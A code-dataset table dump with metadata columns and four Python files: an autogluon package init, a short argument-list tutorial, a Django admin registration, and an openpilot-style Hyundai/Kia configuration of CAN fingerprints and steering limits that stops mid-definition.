hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
73712f53154f0fd97f1a49bfee29bba0da3928ba
| 25
|
py
|
Python
|
text/src/autogluon/text/utils/__init__.py
|
mseeger/autogluon-1
|
e8d82363ce07fd8e3087bcdd2d71c6f6bd8fd7a0
|
[
"Apache-2.0"
] | null | null | null |
text/src/autogluon/text/utils/__init__.py
|
mseeger/autogluon-1
|
e8d82363ce07fd8e3087bcdd2d71c6f6bd8fd7a0
|
[
"Apache-2.0"
] | null | null | null |
text/src/autogluon/text/utils/__init__.py
|
mseeger/autogluon-1
|
e8d82363ce07fd8e3087bcdd2d71c6f6bd8fd7a0
|
[
"Apache-2.0"
] | null | null | null |
from .try_import import *
| 25
| 25
| 0.8
| 4
| 25
| 4.75
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 25
| 1
| 25
| 25
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
738247398cec7214ee53fa2c6086810240a298b3
| 123
|
py
|
Python
|
python_tutorial/argumentList.py
|
vchatchai/python101
|
c2f1c7b0f62a4600f9c64af566dc5630742580f2
|
[
"Apache-2.0"
] | null | null | null |
python_tutorial/argumentList.py
|
vchatchai/python101
|
c2f1c7b0f62a4600f9c64af566dc5630742580f2
|
[
"Apache-2.0"
] | null | null | null |
python_tutorial/argumentList.py
|
vchatchai/python101
|
c2f1c7b0f62a4600f9c64af566dc5630742580f2
|
[
"Apache-2.0"
] | null | null | null |
def concat(*args, sep="/"):
return sep.join(args)
print(concat("earth", "mars", "venus"))
print(*list(range(5,10)))
| 15.375
| 39
| 0.609756
| 18
| 123
| 4.166667
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028037
| 0.130081
| 123
| 8
| 40
| 15.375
| 0.672897
| 0
| 0
| 0
| 0
| 0
| 0.120968
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0
| 0.25
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
|
0
| 6
|
73a646848a6ab38aa632de4810d2014665bca0c1
| 139
|
py
|
Python
|
comments/admin.py
|
bobjiangps/django-blog
|
6afd36fa96c5a027546575b362b0a481c5d7c1a5
|
[
"MIT"
] | 3
|
2019-10-25T13:08:04.000Z
|
2020-01-05T11:29:18.000Z
|
comments/admin.py
|
bobjiangps/django-blog
|
6afd36fa96c5a027546575b362b0a481c5d7c1a5
|
[
"MIT"
] | 9
|
2020-05-10T10:13:56.000Z
|
2022-03-11T23:33:52.000Z
|
comments/admin.py
|
bobjiangps/django-blog
|
6afd36fa96c5a027546575b362b0a481c5d7c1a5
|
[
"MIT"
] | 3
|
2019-02-11T02:55:51.000Z
|
2020-01-05T11:29:20.000Z
|
from django.contrib import admin
from .models import Comment
#import xadmin
admin.site.register(Comment)
#xadmin.site.register(Comment)
| 15.444444
| 32
| 0.805755
| 19
| 139
| 5.894737
| 0.526316
| 0.214286
| 0.339286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107914
| 139
| 8
| 33
| 17.375
| 0.903226
| 0.302158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
73e096b41ff18cfab7dee9a3d9170ac213abbde6
| 15,298
|
py
|
Python
|
selfdrive/car/hyundai/values.py
|
lth1436/nirotest
|
390b8d92493ff50827eaa1987bac07101d257dd9
|
[
"MIT"
] | null | null | null |
selfdrive/car/hyundai/values.py
|
lth1436/nirotest
|
390b8d92493ff50827eaa1987bac07101d257dd9
|
[
"MIT"
] | null | null | null |
selfdrive/car/hyundai/values.py
|
lth1436/nirotest
|
390b8d92493ff50827eaa1987bac07101d257dd9
|
[
"MIT"
] | null | null | null |
from cereal import car
from selfdrive.car import dbc_dict
from common.params import Params
Ecu = car.CarParams.Ecu
# Steer torque limits
class SteerLimitParams:
STEER_MAX = 409 # 409 is the max, 255 is stock
STEER_DELTA_UP = 3
STEER_DELTA_DOWN = 7
STEER_DRIVER_ALLOWANCE = 50
STEER_DRIVER_MULTIPLIER = 2
STEER_DRIVER_FACTOR = 1
class CAR:
ELANTRA = "HYUNDAI ELANTRA LIMITED ULTIMATE 2017"
ELANTRA_GT_I30 = "HYUNDAI I30 N LINE 2019 & GT 2018 DCT"
GENESIS_G80 = "GENESIS G80 2017"
GENESIS_G90 = "GENESIS G90 2017"
HYUNDAI_GENESIS = "HYUNDAI GENESIS 2015-2016"
KIA_FORTE = "KIA FORTE E 2018"
KIA_OPTIMA = "KIA OPTIMA SX 2019 & 2016"
KIA_OPTIMA_H = "KIA OPTIMA HYBRID 2017 & SPORTS 2019"
KIA_SORENTO = "KIA SORENTO GT LINE 2018"
KIA_STINGER = "KIA STINGER GT2 2018"
KONA = "HYUNDAI KONA 2019"
KONA_EV = "HYUNDAI KONA ELECTRIC 2019"
SANTA_FE = "HYUNDAI SANTA FE LIMITED 2019"
SANTA_FE_1 = "HYUNDAI SANTA FE has no scc"
SONATA = "HYUNDAI SONATA 2020"
SONATA_2019 = "HYUNDAI SONATA 2019"
PALISADE = "HYUNDAI PALISADE 2020"
GRANDEUR_H_19 = "HYUNDAI GRANDEUR HYBRID 2019"
GRANDEUR_H_20 = "HYUNDAI GRANDEUR HYBRID 2020"
IONIQ_EV = "HYUNDAI IONIQ ELECTRIC 2016"
NIRO_HEV = "KIA NIRO HYBRID 2016 ~ 2018"
NIRO_EV = "KIA NIRO ELECTRIC"
class Buttons:
NONE = 0
RES_ACCEL = 1
SET_DECEL = 2
GAP_DIST = 3
CANCEL = 4
params = Params()
fingerprint_issued_fix = params.get("FingerprintIssuedFix", encoding='utf8') == "1"
FINGERPRINTS = {
CAR.ELANTRA: [{
}],
CAR.ELANTRA_GT_I30: [{
}],
CAR.HYUNDAI_GENESIS: [{
}],
CAR.SANTA_FE: [{
}],
CAR.SONATA: [{
}],
CAR.SONATA_2019: [{
}],
CAR.KIA_OPTIMA: [{
}],
CAR.KIA_SORENTO: [{
}],
CAR.KIA_STINGER: [{
}],
CAR.GENESIS_G80: [{
}],
CAR.GENESIS_G90: [{
}],
CAR.KIA_FORTE: [{
}],
CAR.KIA_OPTIMA_H: [{
}],
CAR.PALISADE: [{
}],
CAR.GRANDEUR_H_19: [{
}],
CAR.IONIQ_EV: [{
}],
CAR.GRANDEUR_H_20: [{
}],
CAR.NIRO_HEV: [{
68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8
},
{
68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8
}],
CAR.NIRO_EV: [{
127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 8, 1151: 6, 1157: 4, 1168: 7, 1173: 8, 1186: 2, 1191: 2, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1473: 8, 1507: 8, 1535: 8
},
{
127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 546: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 8, 1151: 6, 1157: 4, 1168: 7, 1173: 8, 1186: 2, 1191: 2, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1473: 8, 1507: 8, 1535: 8
}],
CAR.KONA: [{
}],
CAR.KONA_EV: [{
}],
}
"""
if fingerprint_issued_fix:
FINGERPRINTS += {
CAR.NIRO_HEV: [
{304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1535: 8},
{304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1535: 8},
{304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1470: 8, 1535: 8},
{304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1470: 8, 1535: 8},
{304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1292: 8, 1345: 8, 1363: 8, 1419: 8, 1429: 8, 1448: 8, 1456: 4},
{127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1535: 8},
{127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1535: 8},
{127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1535: 8},
{127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1535: 8},
{127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1535: 8},
{68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8},
{68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8},
{68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 546: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8},
{68: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1470: 8, 1476: 8, 1535: 8},
{68: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8},
{68: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 549: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8},
{68: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 549: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8},
{68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8},
{68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8},
{68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 546: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8},
{882: 8, 304: 8, 320: 8, 1173: 8, 544: 8, 339: 8, 352: 8, 356: 4, 902:8, 576: 8, 881: 8, 1136: 6, 1280: 1, 903: 8, 916:8, 1056: 8, 1057: 8, 1265:4, 1470:8, 1456:4, 1407:8, 897:8, 593:8, 688:5, 832:8 }
],
}
else:
FINGERPRINTS += {
CAR.NIRO_HEV: [
{68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8},
{68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 832: 8, 881: 8, 882: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1173: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8},
],
}
"""
ECU_FINGERPRINT = {
Ecu.fwdCamera: [832, 1156, 1191, 1342]
}
FW_VERSIONS = {
CAR.SONATA: {
(Ecu.fwdRadar, 0x7d0, None): [b'\xf1\x00DN8_ SCC FHCUP 1.00 1.00 99110-L0000 '],
(Ecu.esp, 0x7d1, None): [b'\xf1\x8758910-L0100\xf1\x00DN ESC \x06 104\x19\x08\x01 58910-L0100\xf1\xa01.04'],
(Ecu.engine, 0x7e0, None): [b'\xf1\x87391162M003\xf1\xa0000F'],
(Ecu.eps, 0x7d4, None): [b'\xf1\x8756310L0010\x00\xf1\x00DN8 MDPS C 1.00 1.01 56310L0010\x00 4DNAC101\xf1\xa01.01'],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00DN8 MFC AT USA LHD 1.00 1.01 99211-L0000 191016'],
(Ecu.transmission, 0x7e1, None): [b'\xf1\x00bcsh8p54 U903\x00\x00\x00\x00\x00\x00SDN8T16NB0z{\xd4v'],
}
}
CHECKSUM = {
"crc8": [CAR.SANTA_FE, CAR.SONATA, CAR.PALISADE],
"6B": [CAR.KIA_SORENTO, CAR.HYUNDAI_GENESIS],
}
FEATURES = {
